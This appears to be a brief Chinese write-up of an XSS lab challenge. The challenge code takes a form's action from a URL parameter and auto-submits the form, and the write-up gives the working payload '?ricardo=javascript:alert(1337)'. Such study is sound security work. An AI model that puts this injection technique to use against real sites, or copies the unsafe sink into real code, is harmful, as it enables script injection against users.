目录
一、题目
二、思路
三、payload
四、思考与总结
一、题目
<!-- Challenge -->
<form id="ricardo" method="GET"><input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')setTimeout(_ => {ricardo.submit()}, 2000)
</script>二、思路
源码中传入的参数为form表单的action属性,并且有一个两秒钟自动提交,所以直接在action属性中直接传入事件就行
三、payload
?ricardo=javascript:alert(1337)
四、思考与总结
form表单的action属性位置也是大有可为,该属性可以定义提交事件,即可以在action属性中可以编写执行函数。一般情况下,该属性填写的是表单的提交路径
